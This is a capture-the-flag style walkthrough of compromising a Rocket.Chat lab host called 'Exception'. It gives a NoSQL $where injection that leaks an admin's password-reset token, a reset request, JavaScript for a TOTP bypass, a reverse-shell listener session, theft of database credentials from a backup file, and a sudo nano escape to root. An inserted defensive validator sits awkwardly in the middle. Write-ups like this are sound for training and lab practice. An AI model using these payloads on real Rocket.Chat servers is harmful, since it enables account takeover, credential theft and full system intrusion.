July 4, 2026
{HSM} Exception
By Nihat Rashidli
Enumeration
Nmap scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 62 OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:7c:3a:db:22:76:47:d9:29:af:da:cd:0d:1b:22:d5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAeLY/rLtwv0qk2/SFFpZzsW3IPmAKawKPP+tHxArRloDe8ON2q7olsI+LxEf+0Ih9ShCAgRpZPETKq+RykwDzE=
| 256 45:65:36:61:8d:79:c3:dc:f7:a1:71:37:7d:f1:a1:cf (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFvO+F/PDZZ2uWnq9XijgAX82ApWsZuRinXeoki037iw
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.58 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Exception
|_http-server-header: Apache/2.4.58 (Ubuntu)
3000/tcp open ppp? syn-ack ttl 61
SSH(22)
┌──(kali㉿kali)-[~/hacksmarter/exception]
└─$ ssh root@exception.hsm
The authenticity of host 'exception.hsm (10.1.185.172)' can't be established.
ED25519 key fingerprint is: SHA256:Ef/OWUCxZP04+ByuRVegbjuQjqITaL4tnrWxn7bVtmk
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'exception.hsm' (ED25519) to the list of known hosts.
root@exception.hsm's password:
- Password-based authentication, so we need credentials to log in
HTTP(80)
- After running dirsearch, only robots.txt was found. The site is a ChatGPT-like thing.
- The page source reveals that this is just a rabbit hole: the page does no processing and sends no requests, so there is nothing to intercept.
HTTP(3000)
- There is Rocket.Chat software, which is used for team communication
- This website is also using a Mongo database, so we can try a few NoSQL injection payloads
- We tried a few payloads, but it seems that the login is not vulnerable to NoSQL injection
- We can also register an account
- When logging in, the client does not send our password in plaintext but hashes it with SHA-256 first
Our account credentials:
ferka:password123
Exploitation
After creating an account, there is a channel called general in which we can find the admin user and his email address.
The email is localh0ste@exception.local
We can find out more about the version from the info endpoint; there may be known vulnerabilities.
http://exception.hsm:3000/api/info
GET /api/v1/users.list?query={"$where"%3a"this.username==='localh0ste'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"} HTTP/1.1
Reset token acquired: yKGvYi9tSTuGO2YBIqt3OTM-U9aMS1TN-gi1cLdkoMA
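As an added, defensive example (not Rocket.Chat's code and not from the original writeup): a server-side check that parses the query parameter of a users.list request and rejects MongoDB operators that execute caller-supplied JavaScript, run against the request line above. The base URL used for parsing and the benign comparison request are assumptions.

```javascript
// Added, defensive example (not Rocket.Chat's code): inspect the "query"
// parameter of a users.list request and reject MongoDB operators that run
// server-side JavaScript. The $where filter in the writeup above is the
// kind of input this rejects. Base URL and benign request are constructed.

// Operators that evaluate caller-supplied JavaScript inside MongoDB.
const JS_OPERATORS = new Set(["$where", "$function", "$accumulator"]);

// Walk a parsed JSON filter and collect every JS-executing operator key.
function findOperatorAbuse(node, path = "query") {
  const problems = [];
  if (Array.isArray(node)) {
    node.forEach((v, i) => problems.push(...findOperatorAbuse(v, `${path}[${i}]`)));
  } else if (node && typeof node === "object") {
    for (const [key, value] of Object.entries(node)) {
      if (JS_OPERATORS.has(key)) {
        problems.push(`${path}.${key}: server-side JavaScript operator`);
      }
      problems.push(...findOperatorAbuse(value, `${path}.${key}`));
    }
  }
  return problems;
}

// Parse an HTTP request line ("GET /path?query=... HTTP/1.1") and decide
// whether its query filter is acceptable. Unparseable JSON is rejected too.
function inspectUsersListRequest(requestLine) {
  const target = requestLine.split(" ")[1] || "";
  const url = new URL(target, "http://localhost:3000"); // assumed base for parsing
  const raw = url.searchParams.get("query");
  if (raw === null) return { accepted: true, problems: [] };
  let filter;
  try {
    filter = JSON.parse(raw);
  } catch (e) {
    return { accepted: false, problems: ["query: not valid JSON"] };
  }
  const problems = findOperatorAbuse(filter);
  return { accepted: problems.length === 0, problems };
}

// Constructed inputs: the request line from the writeup and a benign lookup.
const INJECTED_REQUEST_LINE =
  `GET /api/v1/users.list?query={"$where"%3a"this.username==='localh0ste'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"} HTTP/1.1`;
const BENIGN_REQUEST_LINE = `GET /api/v1/users.list?query={"username":"ferka"} HTTP/1.1`;

console.log(inspectUsersListRequest(INJECTED_REQUEST_LINE)); // accepted: false
console.log(inspectUsersListRequest(BENIGN_REQUEST_LINE));   // accepted: true
```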
POST /api/v1/method.callAnon/resetPassword HTTP/1.1
Host: exception.hsm:3000
User-Agent: Electron/
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.146:3000/channel/general
Content-Type: application/json
X-User-Id: dntHe7AnzXpXnP5Gd
X-Auth-Token: KCBP63FF0t1Ur2PyYwiMLB1eZrm7nvLUrLUJLJr4_yk
X-Requested-With: XMLHttpRequest
Content-Length: 142
Origin: http://exception.hsm:3000
Connection: keep-alive
Cookie: rc_uid=dntHe7AnzXpXnP5Gd; rc_token=KCBP63FF0t1Ur2PyYwiMLB1eZrm7nvLUrLUJLJr4_yk
{"message":"{\"msg\":\"method\",\"method\":\"resetPassword\",\"params\":[\"yKGvYi9tSTuGO2YBIqt3OTM-U9aMS1TN-gi1cLdkoMA\",\"P@$$w0rd!1234\"]}"}
Username : localh0ste
Password : P@$$w0rd!1234
But then we are asked to enter a 2FA code; however, there is a TOTP bypass, shown in the snippet below.
const USER = "target";
const PASSWORD = "correct horse battery staple";
fetch("/api/v1/login", {
  method: "POST",
  body: `{
    "cas": true,
    "totp": {
      "code": "Not Today",
      "type": "resume",
      "login": {
        "user": {
          "username": "${USER}"
        },
        "password": "${PASSWORD}"
      }
    }
  }`,
  headers: {
    "Content-Type": "application/json"
  }
})
  .then(res => res.json())
  .then(({ data: { userId, authToken } }) => {
    console.log(`login as ${userId}`);
    Meteor._localStorage.setItem(Accounts.USER_ID_KEY, userId);
    Meteor._localStorage.setItem(Accounts.LOGIN_TOKEN_KEY, authToken);
    window.location.reload();
  });
Then we are in as the admin account.
Getting RCE
┌──(root㉿kali)
└─# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.200.68.253] from (UNKNOWN) [10.1.253.177] 46078
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
rocketchat@9593cc10a7dd:/app/bundle/programs/server$ id
id
uid=65533(rocketchat) gid=65533(rocketchat) groups=65533(rocketchat)
rocketchat@9593cc10a7dd:/app/bundle/programs/server$ whoami
whoami
rocketchat
rocketchat@9593cc10a7dd:/app/bundle/programs/server$
Post-Exploitation
Getting the database username and password
rocketchat@9593cc10a7dd:/$ cat Backup_db.txt
DATABASE_USER=Ron
DATABASE_PASSWORD=AtentiouSenoU
DATABASE_NAME=chatty
DATABASE_HOST=localhost
Ron:AtentiouSenoU
Then we SSH in as Ron with these credentials.
Enumeration as Ron
Getting root access!!
Ron@Chatty:/tmp$ sudo -l
Matching Defaults entries for Ron on Chatty:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User Ron may run the following commands on Chatty:
(root) NOPASSWD: /opt/log_inspector/check_log --clean
We can run /opt/log_inspector/check_log --clean as root, which drops us into nano running as root. By pressing CTRL+T we can execute commands as root, and from there we get a root shell.